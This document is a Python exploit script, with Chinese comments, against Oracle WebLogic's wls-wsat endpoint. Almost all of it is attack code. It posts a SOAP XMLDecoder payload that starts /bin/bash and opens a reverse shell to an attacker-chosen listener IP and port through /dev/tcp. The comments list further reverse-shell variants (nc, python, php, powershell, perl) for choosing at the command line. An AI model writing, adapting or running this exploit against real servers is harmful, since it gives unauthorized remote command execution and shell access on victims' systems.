#!/usr/bin/env python
# -*- coding: utf-8 -*-


import requests
import re
import sys

from json_parse import Jsonparse
from json_parse import Reverse_shell



class WebloicScanner(object):
	def __init__(self,ip,port,level,cmd):
		self.ip = ip
		self.port = port
		self.level = level
		self.cmd = cmd
        
	def do (self):
		poc_str = '''
		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
		<soapenv:Header>
			<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
			<java>
				<object class="java.lang.ProcessBuilder">
				<array class="java.lang.String" length="3">
					<void index="0">
					<string>/bin/bash</string>
					</void>
					<void index="1">
					<string>-c</string>
					</void>
					<void index="2">
                    <string>printf $(echo -n "/bin/bash%20-i%20%3E%26%20/dev/tcp/{}/{}%200%3E%261" | sed 's/\\\/\\\\\\\/g;s/\(%\)\([0-9a-fA-F][0-9a-fA-F]\)/\\\\x\\2/g')"\\n" | tee poc.sh | bash</string>
					</void>
				</array>
				<void method="start"/>
				</object>
			</java>
			</work:WorkContext>
		</soapenv:Header>
		<soapenv:Body/>
		</soapenv:Envelope>
		'''.format(listenIp,listenPort)
		return poc_str
	def reverse_shell(self):
		poc_str = self.do()
	

		headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
			"Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
			"Content-Type": "text/xml"
		}
		tg = 'http://'+str(self.ip)+':'+str(self.port)
		url= tg +'/wls-wsat/CoordinatorPortType'
		try:
			req = requests.post(url, data=poc_str, verify=False, timeout=self.level, headers=headers)
		except Exception as e :
			print(e)


if __name__ == '__main__':
    # 定义脚本参数接收
    # config.json:json文件的相对路径
    # ​	targetip：目标主机ip
    # ​	targetPort：目标主机端口
    # ​	反弹shell类型： 
    # ​		1——bash反弹
    # ​		2——nc反弹
    # ​		3——python反弹
    # ​		4——php反弹
    # ​		5——windows powershell反弹
    # ​		6——常规命令的执行接口
    #       7——表示perl反弹shell
    # ​	listenIp——监听服务器ip
    # ​	listenPort——监听端口
    # ​	exec_cmd——用户可执行的shell命令，接口的形式，默认传一个值，否者会报错， 传入时一定要用引号引起来，不然空格会当成多个参数使用
	jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
	jsonobj = Jsonparse(jsonfile)
	jsondata = jsonobj.parse()
	targetIp = sys.argv[2]
	timeout = jsondata['timeout']
	targetPort = sys.argv[3]
    
	reverseType = sys.argv[4]
	listenIp = sys.argv[5]
	listenPort = sys.argv[6]
	exec_cmd = sys.argv[7]

    # 实例化反弹shell参数的对象
	reverse_shell = Reverse_shell(listenIp, listenPort, int(reverseType), exec_cmd)
    # 获取反弹shell的payload
	cmd = reverse_shell.select_type()
    # print(cmd)

	Scanner = WebloicScanner(targetIp, int(targetPort), timeout, cmd)
    #判断reverseType类型是反弹shell，还是执行命令
	if int(reverseType) == 6:
		exit()
	else:
		Scanner.reverse_shell()
